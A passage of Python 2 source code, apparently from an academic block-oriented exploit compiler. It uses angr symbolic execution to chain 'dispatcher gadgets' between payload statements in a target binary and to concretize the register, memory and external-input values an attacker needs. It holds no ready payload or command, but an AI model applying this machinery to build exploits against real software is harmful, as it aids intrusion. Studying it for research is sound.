registers,\n        self.__mem = { }                            # memory and\n        self.__ext = { }                            # external data (from files, sockets, etc.)\n\n\n        # 0xca00013b is actually pool_base + 0x13b\n        self.__relative = { }\n        \n        self.condreg = ''\n        # regsets that are not checked after block execution\n        self.unchecked_regsets = []\n\n        # even though we avoid all clobbering blocks from our path, this doesn't mean that\n        # registers may not get clobbered. This usally happens inside system or library calls\n        # where registers are being changed, even though there are no clobbering blocks.\n        # \n        # to deal with it, we simply mark a register as immutable after \n        #\n        # all register that used by SPL are immutable (only functional blocks can modify them)\n        #        \n        self.__imm_regs = set()                     # initially empty; add registers on the fly\n        #self.__imm_regs = set([real for _, real in regmap])\n\n        self.__sim_mode = SIM_MODE_INVALID\n\n        self.FOO = []\n\n#        print 'RSVPs', \n#        for addr, x in sorted(rsvp.iteritems()):\n#            print hex(addr), x\n\n\n        # the base adress that uninitialized symbolic variables should be allocated \n        # don't start form 0 to catch allocations that start BEFORE the initial (.e.g. if \n        # [rax + 0x20] = ALLOC, then rax will be below allocator)\n        self.__alloc_size = 0x100          \n        \n        # create a CFG shortest path object\n        self.__cfg_sp = path._cfg_shortest_path(self.__cfg, clobbering, adj)\n\n        # create a symbolic execution state\n        self.__state = self.__proj.factory.call_state(\n                                    mode       = 'symbolic', \n                                    addr       = entry, \n                                    stack_base = STACK_BASE_ADDR, \n                                    stack_size = 0x10000\n                        )\n\n\n        # initialize all registers with a symbolic variable\n        self.__state.regs.rax = self.__state.se.BVS(\"rax\", 64)\n        self.__state.regs.rbx = self.__state.se.BVS(\"rbx\", 64)\n        self.__state.regs.rcx = self.__state.se.BVS(\"rcx\", 64)\n        self.__state.regs.rdx = self.__state.se.BVS(\"rdx\", 64)\n        self.__state.regs.rsi = self.__state.se.BVS(\"rsi\", 64)\n        self.__state.regs.rdi = self.__state.se.BVS(\"rdi\", 64)\n        \n        # rsp must be concrete and properly initialized\n        self.__state.registers.store('rsp', RSP_BASE_ADDR, size=8)\n\n        # rbp may also needed as it's mostly used to access local variables (e.g., \n        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are\n        # rsp related. In these cases it may worth to use rbp as well.\n        if MAKE_RBP_SYMBOLIC:\n            self.__state.regs.rbp = self.__state.se.BVS(\"rbp\", 64)\n        else:\n            self.__state.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8)        \n\n        self.__state.regs.r8  = self.__state.se.BVS(\"r08\", 64)\n        self.__state.regs.r9  = self.__state.se.BVS(\"r09\", 64)\n        self.__state.regs.r10 = self.__state.se.BVS(\"r10\", 64)\n        self.__state.regs.r11 = self.__state.se.BVS(\"r11\", 64)\n        self.__state.regs.r12 = self.__state.se.BVS(\"r12\", 64)\n        self.__state.regs.r13 = self.__state.se.BVS(\"r13\", 64)\n        self.__state.regs.r14 = self.__state.se.BVS(\"r14\", 64)\n        self.__state.regs.r15 = self.__state.se.BVS(\"r15\", 64)\n\n\n        # remember the initial symbolic variables for the registers\n        self.__inireg = { r : self.__getreg(r) for r in HARDWARE_REGISTERS }\n\n\n        # initialize SPL variables        \n        self.__init_vars( varmap )  # this can trhow an exception\n      \n\n        # An alternative way to enable/disable hooks is this:\n        #       s = state.inspect.b('mem_write', ...)\n        #       s.enabled = False\n        self.__disable_hooks = False                # enable breakpoints \n       \n        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )\n        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  \n        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)\n        self.__state.inspect.b('symbolic_variable', \n                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )\n        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )\n        \n\n\n        self.__origst = self.__state.copy()         # create a copy of the original state\n\n\n        # deep copy \n        self.imm           = self.__imm\n        self.sym           = self.__sym\n        self.inireg        = self.__inireg\n        self.reg           = self.__reg\n        self.mem           = self.__mem\n        self.ext           = self.__ext\n        self.relative      = self.__relative\n        self.imm_regs      = self.__imm_regs\n        self.alloc_size    = self.__alloc_size\n        self.state         = self.__state        \n        self.disable_hooks = self.__disable_hooks = False                # enable breakpoints         \n\n\n        self.project    = project\n        self.cfg        = cfg\n        self.clobbering = clobbering\n        self.adj        = adj\n        self.IR         = IR\n        self.regmap     = regmap\n        self.varmap     = varmap\n        self.rsvp       = rsvp\n        self.entry      = entry\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __check_regsets(): TODO:\n    #\n    # Some RSVPs have weird addresses that we can't even concretize right before the block execution:\n    #   <Bool (Reverse(symbolic_read_unconstrained_277383_64) + (r13_277379_64 << 0x3)) == x_472_64>\n    #\n    # This means that our reservation will be wrong and the register will never be assigned to the\n    # right value. A quick patch here, is to check whether register gets concretized to the right\n    # value after the block execution and if not we add the desired constraint\n    #\n    # <Bool (0#32 .. (mem_d8003100_481_64[31:0] & 0xf8000000)) != 0x30000000>]\n    #\n    def __check_regsets( self, state=None ):\n        if not state:\n            state = self.__state\n\n        # print '^^^^^^^^^^^^^^', self.unchecked_regsets\n\n\n        for reg, val in self.unchecked_regsets:\n            if isinstance(val, tuple):\n                pass\n                warn('Oups!')\n\n            else:\n                if state.se.eval( self.__getreg(reg, state) ) != val:\n                    \n                    warn('Wrong concretized value! Fixing it.... %x != %x' %                        \n                            (state.se.eval( self.__getreg(reg, state) ), val))\n\n                    # print '-----------> ',  reg, self.__getreg(reg, state)\n                    state.add_constraints(self.__getreg(reg, state) == val)\n\n                    if not state.satisfiable():\n                        dbg_prnt(DBG_LVL_2, \"Reservation constraint was un-satisfiable. Rolling back...\")\n\n                        self.unchecked_regsets = [] # all registers are checked!\n                        return False                # check failed\n\n        pass\n\n        self.unchecked_regsets = []                 # all registers are checked!\n\n        return True\n\n\n    \n    # ---------------------------------------------------------------------------------------------\n    # simulate_edge(): This function is invoked for every edge in the induced subgraph Hk and it\n    #       performs a symbolic execution from one accepted block to another. Essentially, its\n    #       purpose is to find a \"dispatcher gadget\" (i.e., a sequence of non-clobbering blocks)\n    #       between two SPL statements.\n    #\n    #       Unfortunately, the symbolic execution engine, may take forever to move from the one\n    #       accepted block to the other To address this issue, we \"guide\" the symbolic execution,\n    #       by selecting the exact subpath that will follow. This path however, is just an \n    #       estimation so it may not be correct. Therefore, simulate_edge() quickly generates\n    #       candidate subpaths, starting from the shortest one.\n    #\n    #       simulate_edge() generates PARAMETER_P different subpaths. However, if we let it\n    #       generate all possible paths, the result will be the same with the unguided symbolic\n    #       execution.\n    #\n    # :Arg currb: Address of the current basic block\n    # :Arg nextb: Address of the basic block that we want to reach\n    # :Arg uid: Current UID of the payload\n    # :Arg loopback: A boolean indicating whether we should simulate a path or a loop\n    # :Ret: If function can extend the path, it returns the basic block path. Otherwise, it returns\n    #   None.\n    #\n    def simulate_edge( self, currb, nextb, uid, loopback=False ):\n        dbg_prnt(DBG_LVL_2, \"Simulating edge (0x%x, 0x%x) for UID = %d\" % (currb, nextb, uid))\n\n\n        # indicate the boundaries \n#        self.__blk_start = currb\n#        self.__blk_end   = currb + ADDR2NODE[currb].size\n#\n#        print 'BLK START', hex(self.__blk_start)\n#        print 'BLK ENDDD', hex(self.__blk_end)\n\n\n#        for a in self.__imm: print 'self.__imm', hex(a)        \n\n        # Check if current basic block matches with the address of the current state\n        if currb != self.__state.addr:              # base check            \n            raise Exception('Illegal transition from current state ' \n                        '(starts from 0x%x, but state is at 0x%x)' % (currb, self.__state.addr))\n\n        if loopback and currb != nextb:             # base check\n            raise Exception('Loopback mode on distinct blocks')\n\n\n        # apply any memory reservations (even if currb == nextb)   \n        if not self.__mem_RSVPs( self.__state, cur_uid=uid, cur_blk=currb ):\n            return None\n\n\n        # print 'SELF CON', self.__state.se.constraints\n\n\n\n        self.__disable_hooks = True\n        \n        for var in self.FOO:\n            # print ' var', str(var)\n            if var.shallow_repr() in SYM2ADDR:\n                addr, size = SYM2ADDR[var.shallow_repr()]\n\n                MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], \n                                                 SYM2ADDR[var.shallow_repr()][1])\n\n                if \"mem_\" not in MEM.shallow_repr():\n                    self.__init_mem(self.__state, addr, size)\n        \n                    MEM = self.__mread(self.__state, SYM2ADDR[var.shallow_repr()][0], \n                                                     SYM2ADDR[var.shallow_repr()][1])\n\n\n               # print 'QQ', SYM2ADDR[var.shallow_repr()], '%%%%', len(var), '==', len(MEM), '|', var, '?', MEM\n                \n                \n                if len(var) != len(MEM):                                    \n                    error('Symbolic variable alias found but size is inconsistent. Discard current path...')                    \n\n                # if it's already a concreate value don't add a constraint\n                else:\n                    # print 'ADD CONSTRAINT FOO', var, MEM\n                    self.__state.add_constraints(var == MEM)\n                \n            else:\n                pass\n            \n        # print 'ok'\n\n\n        # update immutable register set\n        if self.__IR[uid]['type'] == 'regset':\n            \n            reg = [r for v, r in self.__regmap if v == '__r%d' % self.__IR[uid]['reg']][0]\n\n            dbg_prnt(DBG_LVL_3, \"Adding register '%s' to the immutable set.\" % reg)\n            self.__imm_regs.add(reg)\n\n\n        # ---------------------------------------------------------------------\n        # Loopback mode\n        # ---------------------------------------------------------------------\n        if loopback:\n            dbg_prnt(DBG_LVL_2, \"Simluation a loop, starting from 0x%x ...\" % self.__state.addr)\n            \n            # guide the symbolic execution: generate P shortest loops\n            for length, loop in self.__cfg_sp.k_shortest_loops(currb, uid, PARAMETER_P):\n\n                if length > MAX_ALLOWED_SUBPATH_LEN:    # if loop is too long, discard it\n                    # This won't happen as the same check happens inside path.py, but we \n                    # should keep modules independent \n\n                    dbg_prnt(DBG_LVL_3, \"Loop is too big (%d). Discard current path ...\" % length)\n                    break\n            \n\n                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(loop)-2) + [SIM_MODE_FUNCTIONAL]\n\n                # if we need to simulate loop multiple times, we unroll current loop by a constant\n                # factor\n                if SIMULATED_LOOP_ITERATIONS > 2:\n                    loop = loop[:-1]*(SIMULATED_LOOP_ITERATIONS-1)\n                    mode = mode[:-1]*(SIMULATED_LOOP_ITERATIONS-1)\n\n                # warn('LOOP IS %s' % pretty_list(loop))\n\n                # do the actual symbolic execution and verify that loop is correct\n                nextst = self.__simulate_subpath(length, loop, mode)\n\n                if nextst != None:                      # success!\n                    emph(\"Edge successfully simulated.\", DBG_LVL_2)\n\n                    del self.__state                    # we don't need current state\n                    self.__state = nextst               # update state\n\n                    return loop                         # return subpath\n            \n\n        # ---------------------------------------------------------------------\n        # Path mode\n        # ---------------------------------------------------------------------                    \n        else:\n            # guide the symbolic execution: generate P shortest paths\n            for slen, subpath in self.__cfg_sp.k_shortest_paths(currb, nextb, uid, PARAMETER_P):\n\n                if slen > MAX_ALLOWED_SUBPATH_LEN:      # if subpath is too long, discard it\n                    break\n\n\n                mode = [SIM_MODE_FUNCTIONAL] + [SIM_MODE_DISPATCH]*(len(subpath)-1)\n\n                # do the actual symbolic execution and verify if subpath is correct\n                nextst = self.__simulate_subpath(slen, subpath, mode)\n\n                if nextst != None:                      # success!\n                    dbg_prnt(DBG_LVL_2, \"Edge successfully simulated.\")\n\n                    if slen > 0:\n                        # print 'unchecked_regsets', self.unchecked_regsets\n                        self.__check_regsets(nextst)\n\n\n                    del self.__state                    # we don't need current state\n                    self.__state = nextst               # update state\n            \n                    return subpath                      # return subpath\n\n\n                # TODO: !!!\n                #   All paths that endup in some loop here get exeuted exactly once. #\n                #   It's very hard to follow and simulate > 1 times here. We leave it\n                #   as a future work.\n\n        # we cannot simulate this edge. Try another induced subgraph\n        dbg_prnt(DBG_LVL_2, \"Cannot simulate egde. Discarding current induced subgraph...\")\n        \n        return None                             # no subpath to return\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # finalize(): The symbolic variables that are part of the constraints and get overwritten\n    #       are concretized during the symbolic execution (__dbg_write_hook). However there are \n    #       other symbolic variables that are part of the constraints, but they don't get\n    #       overwritten. This function concretizes symbolic variables left in final staet.\n    #\n    # :Ret: None.\n    #\n    def finalize( self ):       \n        # ---------------------------------------------------------------------\n        # TODO: Having a primitive to set registers may be useless.\n        #       Give the option to the attacker to be able to discard solutions\n        #       that use apriori registers\n        #\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Finalizing Apriori Register Assignments (if any):')\n\n            # for reg, val in self.__reg.iteritems():\n            #     # tuples are not part of the constraints and therefore are discarded\n            #     if isinstance(val, tuple):\n            #         pass\n\n        for reg, symv in self.__inireg.iteritems():           \n            \n            # check if any of the original register is still in the constraints\n            if self.__in_constraints(symv):\n                val = self.__state.se.eval(symv)\n                self.__inireg[ reg ] = val\n\n                emph('Apriori register found: %s = 0x%x' % (reg, val), DBG_LVL_0)\n\n            else:\n                self.__inireg[ reg ] = None\n\n        if self.condreg:\n            symv = self.__getreg(self.condreg)           \n            print '--------------- CONDREG', self.condreg, symv\n            \n            if self.__in_constraints(symv):\n                val = self.__state.se.eval(symv)\n                emph('Conditional register found: %s = 0x%x' % (self.condreg, val), DBG_LVL_0)\n\n                self.condreg = (self.condreg, val)\n\n            else:\n                self.condreg = ''                \n\n        # ---------------------------------------------------------------------\n        # Concretize leftovers\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_2, 'Finalizing %d memory addresses...' % len(self.__mem))\n\n        for addr, val in self.__mem.iteritems():\n            dbg_prnt(DBG_LVL_3, 'Inspecting address 0x%x ...' % addr)\n\n            # if __mem[addr] is in the form (value, size), then it's already concretized,\n            # so don't take any actions            \n            if isinstance(val, tuple):\n                continue\n\n            # if address is not concretized already and it's in the symbolic variable set\n            if addr in self.__sym and val > 0:\n                symv = self.__sym[ addr ]           # get symbolic variable\n\n                if self.__in_constraints(symv):     # if part of the constraints, concretize it\n                    realval          = self.__state.se.eval(symv)\n                    self.__mem[addr] = (realval, val)\n\n                    emph('\\tAddress/Value pair found: *0x%x = 0x%x (%d bytes)' % \n                            (addr, realval, val), DBG_LVL_2)\n\n\n                    if addr in self.__ext.values():\n                        dbg_prnt(DBG_LVL_2, '\\tAddress holds an external symbolic variable!')\n\n                else:\n                    dbg_prnt(DBG_LVL_3, '\\tAddress is not in the constraints.')\n                    self.__mem[ addr ] = None           # discard address\n\n            else:\n                self.__mem[ addr ] = None           # discard address\n                dbg_prnt(DBG_LVL_3, '\\tAddress is not needed.')\n\n\n        # TODO: This case \"SYM DICT: 0xd8001000 <BV64 __add__(0xa, r12_562_64, r14_564_64)>\"\n        # will give wrong results when concretized if r12 is relative\n\n        # for a, b in self.__sym.iteritems():\n        #     print 'SYM DICT:', hex(a), b\n        \n\n        # ---------------------------------------------------------------------\n        # Concretize external input\n        # ---------------------------------------------------------------------       \n        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')        \n\n        for var, addr in self.__ext.items():                \n            dbg_prnt(DBG_LVL_3, \"Inspecting external input '%s'\" % var.shallow_repr())\n\n            # print var, addr\n\n\n            # ---------------------------------------------------------------------\n            # Some external variables may be part of the constraints, but not\n            # written to memory\n            # ---------------------------------------------------------------------       \n            if addr == EXTERNAL_UNINITIALIZED:\n                concr = False\n\n\n                if self.__in_constraints(var):\n                    concr = True\n                    ext = var.shallow_repr()\n\n                elif SYMBOLIC_FILENAME in var.shallow_repr():\n                    # print 'insize ;)'\n\n                    \n                    # check again if it's in the constraints\n                    for constraint in self.__state.se.constraints:\n                        # treat constraint as an AST and iterate over its leaves\n                        for leaf in constraint.recursive_leaf_asts:\n                            # we can't compare them directly, so we cast them into strings first\n                            # (not a very \"clean\" way to do that, but it works)\n                            if SYMBOLIC_FILENAME in leaf.shallow_repr():\n                                concr = True\n                                ext = SYMBOLIC_FILENAME\n\n                    \n                if concr:\n                    value = self.__state.se.eval(var)\n\n                    dbg_prnt(DBG_LVL_3, 'External value (%s) found: 0x%x' % \n                                            (ext, value))\n\n                    self.__ext[ var ] = (addr, value)\n\n                else:\n                    dbg_prnt(DBG_LVL_3, 'External value is not needed.')\n\n                continue\n\n\n            elif addr == None or addr not in self.__sym:\n                warn('External symbolic variable is not set')\n\n                del self.__ext[var]\n                continue\n            \n                            \n            value = self.__state.se.eval(self.__sym[addr])\n\n             \n            dbg_prnt(DBG_LVL_3, 'External value found: 0x%x' % value)\n\n            self.__ext[ var ] = (addr, value)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # step(): This function moves the execution forward by 1 basic block.\n    #\n    # :Arg stmty: The type of the last statement\n    # :Ret: None.\n    #\n    def step( self, stmt ):\n        dbg_prnt(DBG_LVL_2, \"Moving one step forward from 0x%x ...\" % self.__state.addr)\n\n\n        # create hte simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=self.__state)\n    \n\n        self.__blk_start = self.__state.addr\n        self.__blk_end   = self.__state.addr + ADDR2NODE[self.__state.addr].size\n\n        # print 'BLK START STEP', hex(self.__blk_start)\n        # print 'BLK ENDDD STEP', hex(self.__blk_end)\n\n\n        self.__disable_hooks = False                # enable hooks to capture reads/writes\n\n        # this should throw no exception (it was already successful in absblk.py)\n        if stmt['type'] == 'call':\n            self.__sim_mode = SIM_MODE_DISPATCH\n        else:\n            # step is in functional mode ;)\n            self.__sim_mode = SIM_MODE_FUNCTIONAL\n        try: \n\n\n            try:\n                node = ADDR2NODE[self.__state.addr]\n\n            except Exception, e:\n                node = None\n\n            num_inst = len(node.instruction_addrs) if node is not None else None\n            if num_inst:\n                simgr.step(num_inst=num_inst)\n            else:\n                simgr.step()\n                \n\n        except Exception, msg:                   \n            dbg_prnt(DBG_LVL_3, \"Step failed. Exception raised: '%s'\" % bolds(str(msg)))\n            return -1\n\n        except angr.errors.SimUnsatError:   # un-satisfiable constraints\n            dbg_prnt(DBG_LVL_2, \"Step constraints were un-satisfiable. Discard current path.\")            \n            return -1\n\n\n        dbg_prnt(DBG_LVL_2, \"Step simulated successfully.\")\n\n        if not simgr.active:\n            print 'Stashes', simgr.stashes\n            \n            dbg_prnt(DBG_LVL_3, \"Stop failed (No 'active' stashes)\")            \n\n            # We may endup in deadended state if the last block is a retn\n            # TODO: Fix that\n            return [0xdeadbeef]\n            # return -1\n\n\n        self.__disable_hooks = True                 # disable hooks again\n        \n\n        # pick the state (if > 1) with satisfiable constraints\n        for state in simgr.active:\n            dbg_prnt(DBG_LVL_3, \"Checking constraints from state: 0x%x\" % state.addr)            \n\n            state_copy = state.copy()\n            unchecked = self.unchecked_regsets[:]\n\n            if self.__check_regsets(state_copy):\n    \n                self.__state = state_copy\n\n                dbg_prnt(DBG_LVL_2, \"Done.\")\n                dbg_arb(DBG_LVL_3, \"Constraints: \", self.__state.se.constraints)\n\n\n                return [state.addr for state in simgr.active]\n\n            del state_copy\n            self.unchecked_regsets = unchecked[:]\n\n        return -1\n       \n    # ---------------------------------------------------------------------------------------------\n    # __deepcopy__():\n    #\n    # :Ret: An identical hardcopy of the current object.\n    #\n    '''\n    def __deepcopy__(self, memo):\n\n        print '__deepcopy__(%s)' % str(memo)\n        return simulate(copy.deepcopy(self, memo))\n\n        fatal('return ORM(copy.deepcopy(dict(self)))')\n    '''\n\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # clone(): This function clones the current simulation object, once it reaches a conditional\n    #       basic block. TODO: elaborate\n    #\n    # :Arg condreg: The register that is used in the condition (must be symbolic)\n    # :Ret: An identical hardcopy of the current object.\n    #\n    def clone( self, condreg ):\n        \n        dbg_prnt(DBG_LVL_1, \"Cloning current state at 0x%x ...\" % self.__state.addr)\n\n        print 'RBX', self.__state.regs.rbx, self.__inireg['rbx'], self.__getreg('rbx')\n        \n\n        # TODO: That's a bad way to do it. Nevermind it works.\n        if   condreg == 'rax': self.__state.regs.rax = self.__state.se.BVS(\"cond_rax\", 64)                                \n        elif condreg == 'rbx': self.__state.regs.rbx = self.__state.se.BVS(\"cond_rbx\", 64)\n        elif condreg == 'rcx': self.__state.regs.rcx = self.__state.se.BVS(\"cond_rcx\", 64)\n        elif condreg == 'rdx': self.__state.regs.rdx = self.__state.se.BVS(\"cond_rdx\", 64)\n        elif condreg == 'rsi': self.__state.regs.rsi = self.__state.se.BVS(\"cond_rsi\", 64)\n        elif condreg == 'rdi': self.__state.regs.rdi = self.__state.se.BVS(\"cond_rdi\", 64)\n        elif condreg == 'rbp': self.__state.regs.rbp = self.__state.se.BVS(\"cond_rbp\", 64)\n        elif condreg == 'r8':  self.__state.regs.r8  = self.__state.se.BVS(\"cond_r08\", 64)\n        elif condreg == 'r9':  self.__state.regs.r9  = self.__state.se.BVS(\"cond_r09\", 64)\n        elif condreg == 'r10': self.__state.regs.r10 = self.__state.se.BVS(\"cond_r10\", 64)\n        elif condreg == 'r11': self.__state.regs.r11 = self.__state.se.BVS(\"cond_r11\", 64)\n        elif condreg == 'r12': self.__state.regs.r12 = self.__state.se.BVS(\"cond_r12\", 64)\n        elif condreg == 'r13': self.__state.regs.r13 = self.__state.se.BVS(\"cond_r13\", 64)\n        elif condreg == 'r14': self.__state.regs.r14 = self.__state.se.BVS(\"cond_r14\", 64)\n        elif condreg == 'r15': self.__state.regs.r15 = self.__state.se.BVS(\"cond_r15\", 64)\n\n        self.condreg = condreg\n        # self.__inireg[ condreg ] = self.__state.regs.rbx\n\n\n        state_copy = self.__state.copy()                        \n\n        # create hte simulation manager object\n        simgr = self.__proj.factory.simulation_manager(thing=state_copy)\n  \n        print 'Stashes', simgr.stashes\n        print 'Constraints', self.__state.se.constraints\n\n        \n        # this should throw no exception (it was already successful in absblk.py)\n        simgr.step()\n\n        print 'Stashes', simgr.stashes\n\n\n        # we should have exactly 2 active stashes\n        print simgr.active[0].se.constraints\n        print simgr.active[1].se.constraints\n\n        if len(simgr.active) != 2:              \n            print simgr.active\n            raise Exception('Conditional jump state should have 2 active stashes')\n       \n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n        \n        self.entry = self.__state.addr\n        newsim = simulate(self.project, self.cfg, self.clobbering, self.adj, self.IR,\n                                        self.regmap, self.varmap, self.rsvp, self.entry)\n       \n        newsim.imm           = copy.deepcopy(self.__imm)\n        newsim.sym           = copy.deepcopy(self.__sym)\n        newsim.inireg        = copy.deepcopy(self.__inireg)\n        newsim.reg           = copy.deepcopy(self.__reg)\n        newsim.mem           = copy.deepcopy(self.__mem)\n        newsim.ext           = copy.deepcopy(self.__ext)\n        newsim.relative      = copy.deepcopy(self.__relative)\n        newsim.imm_regs      = copy.deepcopy(self.__imm_regs)\n        newsim.FOO           = copy.deepcopy(self.FOO)\n        newsim.alloc_size    = copy.deepcopy(self.__alloc_size)\n        newsim.state         = self.__state.copy() #copy.deepcopy(self.__state)\n        newsim.inireg        = copy.deepcopy(self.__inireg)\n        newsim.disable_hooks = copy.deepcopy(self.__disable_hooks)\n        newsim.unchecked_regsets = copy.deepcopy(self.unchecked_regsets)\n\n        newsim.copy_locally()\n\n        print 'Constraints', self.__state.se.constraints\n\n    \n        self.__state.add_constraints( simgr.active[1].se.constraints[-1] )\n        newsim.state.add_constraints( simgr.active[0].se.constraints[-1] )\n\n        del state_copy\n        \n        return newsim\n        # return copy.deepcopy(self)\n    \n    \n\n    # ---------------------------------------------------------------------------------------------\n    # stash_context(): Save current context to a stash.\n    #\n    # :Ret: None.\n    #\n    def copy_locally( self ):       \n        self.__imm           = self.imm\n        self.__sym           = self.sym\n        self.__inireg        = self.inireg\n        self.__reg           = self.reg\n        self.__mem           = self.mem\n        self.__ext           = self.ext\n        self.__relative      = self.relative\n        self.__imm_regs      = self.imm_regs\n        # self.FOO             = self.FOO\n        self.__alloc_size    = self.alloc_size\n        self.__state         = self.state\n        self.__disable_hooks = self.disable_hooks\n\n        \n        # state will have action to the parent object. We have to readjust them?\n        self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )\n        self.__state.inspect.b('mem_read',  when=angr.BP_BEFORE, action=self.__dbg_read_hook  )  \n        self.__state.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__dbg_reg_wr_hook)\n        self.__state.inspect.b('symbolic_variable', \n                                            when=angr.BP_AFTER,  action=self.__dbg_symv_hook  )\n        self.__state.inspect.b('call',      when=angr.BP_AFTER, action=self.__dbg_call_hook   )\n  \n\n\n    # ---------------------------------------------------------------------------------------------\n    # stash_context(): Save current context to a stash.\n    #\n    # :Ret: None.\n    #\n    def update_globals( self ):       \n        self.imm           = self.__imm\n        self.sym           = self.__sym\n        self.inireg        = self.__inireg\n        self.reg           = self.__reg\n        self.mem           = self.__mem\n        self.ext           = self.__ext\n        self.relative      = self.__relative\n        self.imm_regs      = self.__imm_regs\n        # self.FOO           = self.FOO\n        self.alloc_size    = self.__alloc_size\n        self.state         = self.__state\n        self.disable_hooks = self.__disable_hooks\n          \n        \n\n    # ---------------------------------------------------------------------------------------------\n    # stash_context(): Save current context to a stash.\n    #\n    # :Ret: None.\n    #      self.__state.inspect.b('mem_write', when=angr.BP_BEFORE, action=self.__dbg_write_hook )  \n    def stash_context( self ):       \n        self.__stash_imm           = copy.deepcopy(self.__imm)\n        self.__stash_sym           = copy.deepcopy(self.__sym)\n        self.__stash_inireg        = copy.deepcopy(self.__inireg)\n        self.__stash_reg           = copy.deepcopy(self.__reg)\n        self.__stash_mem           = copy.deepcopy(self.__mem)\n        self.__stash_ext           = copy.deepcopy(self.__ext)\n        self.__stash_relative      = copy.deepcopy(self.__relative)\n        self.__stash_imm_regs      = copy.deepcopy(self.__imm_regs)\n        self.__stash_FOO           = copy.deepcopy(self.FOO)\n        self.__stash_alloc_size    = copy.deepcopy(self.__alloc_size)\n        self.__stash_state         = self.__state.copy() #copy.deepcopy(self.__state)\n        self.__stash_disable_hooks = copy.deepcopy(self.__disable_hooks)\n        self.__stash_unchecked_regsets = copy.deepcopy(self.unchecked_regsets)\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # drop_context_stash(): Drop context stash.\n    #\n    # :Ret: None.\n    #\n    def drop_context_stash( self ):       \n        del self.__stash_imm\n        del self.__stash_sym \n        del self.__stash_inireg\n        del self.__stash_reg\n        del self.__stash_mem\n        del self.__stash_ext \n        del self.__stash_relative\n        del self.__stash_imm_regs\n        del self.__stash_FOO\n        del self.__stash_alloc_size\n        del self.__stash_state \n        del self.__stash_disable_hooks\n        del self.__stash_unchecked_regsets \n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # unstash_context(): Remove a context from stash and use it.\n    #\n    # :Ret: None.\n    #\n    def unstash_context( self ):       \n        del self.__imm\n        del self.__sym\n        del self.__inireg\n        del self.__reg\n        del self.__mem\n        del self.__ext\n        del self.__relative\n        del self.__imm_regs\n        del self.FOO\n        del self.__alloc_size\n        del self.__state\n        del self.__disable_hooks\n        del self.unchecked_regsets\n\n        self.__imm           = self.__stash_imm\n        self.__sym           = self.__stash_sym \n        self.__inireg        = self.__stash_inireg\n        self.__reg           = self.__stash_reg\n        self.__mem           = self.__stash_mem\n        self.__ext           = self.__stash_ext \n        self.__relative      = self.__stash_relative\n        self.__imm_regs      = self.__stash_imm_regs\n        self.FOO             = self.__stash_FOO\n        self.__alloc_size    = self.__stash_alloc_size\n        self.__state         = self.__stash_state \n        self.__disable_hooks = self.__stash_disable_hooks\n        self.unchecked_regsets = self.__stash_unchecked_regsets\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # constraints(): Get constraints.\n    #\n    # :Ret: None.\n    #\n    def constraints( self ):\n        return self.__state.se.constraints\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __make_relative(): Make an address relative (if needed).\n    #\n    # :Arg addr: Current address\n    # :Ret: A string with the realtive address.\n    #\n    def __make_relative( self, addr ):\n        '''\n        # TODO: breaks for eval/orzhttpd/orzhttpd -s payloads/memrd.spl        \n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND or abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n\n            if abs(addr - RSP_BASE_ADDR) < abs(addr - FRAMEPTR_BASE_ADDR):\n\n                if addr > RSP_BASE_ADDR:\n                    return \"($stack + 0x%03x)\" % (addr - RSP_BASE_ADDR)\n                else:\n                    return \"($stack - 0x%03x)\" % (RSP_BASE_ADDR - addr)\n\n            else:\n                if addr > FRAMEPTR_BASE_ADDR:\n                    return \"($frame + 0x%03x)\" % (addr - FRAMEPTR_BASE_ADDR)\n                else:\n                    return \"($frame - 0x%03x)\" % (FRAMEPTR_BASE_ADDR - addr)\n        '''\n\n\n        if addr in self.__relative:                 # if in relative table\n            return '(' + self.__relative[addr] + ')'\n\n        # frame first\n        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n            if addr > RSP_BASE_ADDR:\n                return \"($stack + 0x%03x)\" % (addr - RSP_BASE_ADDR)\n            else:\n                return \"($stack - 0x%03x)\" % (RSP_BASE_ADDR - addr)\n\n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:\n            if addr > FRAMEPTR_BASE_ADDR:\n                return \"($frame + 0x%03x)\" % (addr - FRAMEPTR_BASE_ADDR)\n            else:\n                return \"($frame - 0x%03x)\" % (FRAMEPTR_BASE_ADDR - addr)\n    \n   \n        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:\n            if addr > POOLVAR_BASE_ADDR:\n                return \"($pool + 0x%03x)\" % (addr - POOLVAR_BASE_ADDR)\n            else:\n                return \"($pool - 0x%03x)\" % (POOLVAR_BASE_ADDR - addr)\n            \n        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:\n            return \"($pool + 0x%03x)\" % (addr - POOLVAR_BASE_ADDR)\n\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return \"($alloca + 0x%03x)\" % (addr - 